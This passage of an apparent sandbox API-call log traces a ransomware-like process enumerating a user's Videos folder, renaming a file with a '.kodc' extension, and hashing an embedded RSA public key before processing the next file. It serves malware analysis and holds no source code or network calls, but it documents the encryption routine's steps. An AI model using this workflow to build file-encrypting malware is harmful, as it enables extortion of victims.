(HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7c68 [0100.274] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0100.274] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0100.274] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0100.274] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0100.274] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7c50 | out: hHeap=0x630000) returned 1 [0100.274] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7c68 | out: hHeap=0x630000) returned 1 [0100.274] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0100.274] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0100.274] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0100.274] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.274] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0100.274] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7c68 [0100.274] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0100.274] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7c50 [0100.274] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0100.275] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c770 [0100.275] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0100.275] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0100.275] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0100.275] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c428 [0100.275] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0100.275] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0100.275] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0100.275] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7c68 | out: hHeap=0x630000) returned 1 [0100.275] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.275] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7c50 | out: hHeap=0x630000) returned 1 [0100.275] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0100.275] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0100.275] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0100.275] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0100.275] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0100.275] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.275] GetCurrentThreadId () returned 0x42c [0100.275] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0100.275] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba6938 [0100.275] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0100.275] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0100.275] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0100.275] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0100.275] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.275] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0100.275] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.276] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.276] GetCurrentThreadId () returned 0x42c [0100.276] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.276] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.276] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0100.276] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.276] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.276] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.276] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.276] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0100.276] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0100.276] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0100.276] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0100.276] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0100.276] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0100.276] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.276] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.276] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.276] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.276] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0100.276] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0100.276] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0100.276] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0100.276] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0100.276] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.276] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7c50 [0100.277] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0100.277] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0100.277] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.277] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.277] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0100.277] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0100.277] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0100.277] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7c68 [0100.277] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0100.277] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0100.277] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0100.277] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7c38 [0100.277] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0100.277] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.277] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.277] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.277] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0100.277] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.277] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0100.277] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7c80 [0100.277] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.277] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7a10 [0100.278] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.278] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0100.278] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0100.278] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0100.278] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0100.278] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0100.278] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7c50 | out: hHeap=0x630000) returned 1 [0100.278] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7c50 [0100.278] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0100.278] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0100.278] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0100.278] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0100.278] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.278] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0100.278] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0100.278] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c540 [0100.278] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0100.278] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c658 [0100.278] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7c50 | out: hHeap=0x630000) returned 1 [0100.279] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x6948b0 [0100.279] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0100.279] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0100.279] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.279] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6932f0 | out: hHeap=0x630000) returned 1 [0100.279] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0100.279] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0100.279] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0100.279] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0100.279] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.279] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6948b0 | out: hHeap=0x630000) returned 1 [0100.279] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0100.279] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.279] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7c80 | out: hHeap=0x630000) returned 1 [0100.279] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.279] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.279] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0100.280] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7c68 | out: hHeap=0x630000) returned 1 [0100.280] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7c38 | out: hHeap=0x630000) returned 1 [0100.280] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0100.280] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0100.280] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0100.280] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7c20 | out: hHeap=0x630000) returned 1 [0100.280] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c538 | out: hHeap=0x630000) returned 1 [0100.280] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0100.280] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0100.280] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0100.280] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0100.280] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0100.280] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.280] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0100.280] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0100.280] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.280] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.280] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0100.280] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba6d90*, nNumberOfBytesToWrite=0x397e, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba6d90*, lpNumberOfBytesWritten=0x9e2fb14*=0x397e, lpOverlapped=0x0) returned 1 [0100.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba6d90 | out: hHeap=0x630000) returned 1 [0100.281] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x3983, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.281] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0100.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0100.281] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0100.281] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0100.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0100.281] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333b018 [0100.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0100.281] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0100.281] WriteFile (in: hFile=0x5cc, lpBuffer=0x333b018*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333b018*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0100.282] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0100.282] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0100.282] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0100.282] CloseHandle (hObject=0x5cc) returned 1 [0100.295] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0100.295] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x870) returned 0x333bc58 [0100.295] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0100.295] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\lBUQXS.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\lbuqxs.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\lBUQXS.mp4.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\lbuqxs.mp4.kodc")) returned 1 [0100.296] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0100.296] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.296] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.298] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0100.298] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x283e8710, ftCreationTime.dwHighDateTime=0x1d5ba89, ftLastAccessTime.dwLowDateTime=0x5b4edb00, ftLastAccessTime.dwHighDateTime=0x1d5c0f6, ftLastWriteTime.dwLowDateTime=0x5b4edb00, ftLastWriteTime.dwHighDateTime=0x1d5c0f6, nFileSizeHigh=0x0, nFileSizeLow=0x48ef, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lNC_IynejbQe.avi", cAlternateFileName="LNC_IY~1.AVI")) returned 1 [0100.298] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0100.298] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x33362c8 [0100.298] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0100.298] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\lNC_IynejbQe.avi") returned=".avi" [0100.298] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\lNC_IynejbQe.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\lnc_iynejbqe.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0100.299] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=18671) returned 1 [0100.299] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0100.304] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x48c9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.304] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0100.305] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.305] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.305] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.305] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x48ef, lpOverlapped=0x0) returned 1 [0100.305] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.305] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0100.305] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.305] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.306] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x6932f0) returned 1 [0100.306] CryptCreateHash (in: hProv=0x6932f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0100.307] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0100.307] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0100.307] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0100.307] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0100.307] GetLastError () returned 0x0 [0100.307] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0100.307] CryptReleaseContext (hProv=0x6932f0, dwFlags=0x0) returned 1 [0100.307] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.307] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0100.307] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0100.307] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.307] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0100.307] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.307] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.307] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x48f0) returned 0x9ba6d90 [0100.307] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0100.308] HeapFree (in: hHeap=0x630000, 